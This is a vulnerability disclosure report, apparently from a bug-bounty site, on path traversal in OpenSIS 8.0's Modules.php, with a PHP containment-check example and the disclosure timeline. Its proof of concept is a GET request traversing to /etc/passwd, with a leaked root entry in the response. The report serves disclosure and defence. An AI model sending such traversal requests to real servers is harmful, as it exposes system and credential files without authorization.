Path Traversal in os4ed/opensis-classic


Reported on

Aug 28th 2021

✍️ Description

The module.php modname parameter in OpenSIS 8.0 is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

🕵️‍♂️ Proof of Concept

//  Modules.php
GET /Modules.php?modname=../../../../../../../../../../../../../../../../etc/passwd
HTTP/1.1 302 Found
Location: index.php

                <!-- Main content -->
                <div class="content-wrapper"><div id='content' name='content' class='clearfix'><div id='update_panel'><div id='divErr' class="text-left text-danger"></div><DIV id="Migoicons" style="visibility:hidden;position:absolute;z-index:1000;top:-100;"></DIV>root:x:0:0:root:/root:/usr/bin/zsh
</div><div id='cal' style='position:absolute;'></div></div>
                <!-- /main content -->

💥 Impact

Enables an attacker to access sensitive files
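
A defensive pattern for this class of bug, shown as an added example that is not part of the report and not the project's fix (the code at commit a2d617 does not appear on this page): resolve the requested module against a fixed base directory and reject anything that resolves outside it. `MODULE_ROOT`, `resolve_module()` and the demo directory layout are hypothetical names chosen for illustration.

```php
<?php
// Added example: containment check for a file-selecting request parameter.
// MODULE_ROOT and resolve_module() are hypothetical names, not openSIS code.

const MODULE_ROOT = __DIR__ . '/modules';

/**
 * Map a user-supplied module name to a file under $root,
 * or return null when the resolved path escapes that directory.
 */
function resolve_module(string $modname, string $root = MODULE_ROOT): ?string
{
    // Reject NUL bytes and anything that is not a .php module path.
    if (strpos($modname, "\0") !== false || !preg_match('/\.php$/', $modname)) {
        return null;
    }

    // realpath() collapses "../" sequences and follows symlinks;
    // it returns false when the target does not exist.
    $base = realpath($root);
    $path = realpath($root . DIRECTORY_SEPARATOR . $modname);
    if ($base === false || $path === false) {
        return null;
    }

    // The resolved path must sit inside the module root. The trailing
    // separator stops "<root>_secret.php" from matching "<root>".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a throwaway module tree plus one file outside it.
$root = sys_get_temp_dir() . '/modroot_' . bin2hex(random_bytes(4));
mkdir($root . '/students', 0700, true);
file_put_contents($root . '/students/Student.php', "<?php // demo module\n");
file_put_contents($root . '_secret.php', "<?php // outside the root\n");

$samples = [
    'students/Student.php',                      // legitimate module
    '../../../../../../etc/passwd',              // traversal string as in the report (shortened)
    '../' . basename($root) . '_secret.php',     // existing .php file outside the root
];
foreach ($samples as $s) {
    printf("%-34s => %s\n", $s, resolve_module($s, $root) ?? 'REJECTED');
}
```

Only the first sample resolves to a path; the second fails the extension check and the third passes it but is rejected by the prefix comparison after `realpath()`.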

2 years ago


Hey N, please confirm your production openSIS URL (localhost, IP address or fake URLs are discouraged).

We have contacted a member of the os4ed/opensis-classic team and are waiting to hear back 2 years ago
We have sent a second follow up to the os4ed/opensis-classic team. We will try again in 10 days. 2 years ago
We have sent a third and final follow up to the os4ed/opensis-classic team. This report is now considered stale. 2 years ago
a year ago


@admin Good Day - This was fixed under -- Would you please be able to manually validate? Thank you

a year ago


Asked the maintainer to confirm this and your other report :)

Pavlos validated this vulnerability a year ago
N has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Pavlos marked this as fixed in 8.0 with commit a2d617 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Modules.php#L954-L976 has been validated
Pavlos published this vulnerability a year ago